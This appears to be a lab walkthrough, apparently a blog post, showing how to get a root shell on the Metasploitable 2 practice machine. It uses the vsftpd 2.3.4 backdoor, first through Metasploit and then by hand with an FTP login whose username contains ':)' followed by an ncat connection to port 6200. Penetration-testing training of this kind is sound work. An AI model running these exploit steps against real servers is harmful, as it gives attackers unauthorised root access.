Metasploitable 2: Exploiting FTP server vsftpd backdoor

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4

In the Metasploit console:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date          Rank       Description
—-                                  —————          —-       ———–
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

Then:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name               Disclosure Date  Rank    Description
—-               —————  —-    ———–
cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  21               yes       The target port

Exploit target:

Id  Name
–  —-
0   Automatic

And to the exploit:

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling…
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.78:39930 -> 192.168.1.103:6200) at 2013-11-02 10:15:45 +0000

And to prove exploit:

whoami
root
Root access obtained.

This exploit is based is based on a backdoor that was slipped into the source code of the vsftpd server version 2.3.4 which opens a listening shell on port 6200 when a smiley face is used in the FTP Username.

Now that we know the vulnerability we can exploit this using a different method within the command prompt. First we make a connection via ftp:

:~# ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 2.3.4)
Name (192.168.1.103:root): whatever:)
331 Please specify the password.
Password:

We can use any password.

Then connect via Ncat:

:~# ncat 192.168.1.103 6200
whoami
root

Here’s a Security Tube video demonstrating the above. It’s worth viewing the Security Tube page which details the injected backdoor code.

And here’s another video using Netcat: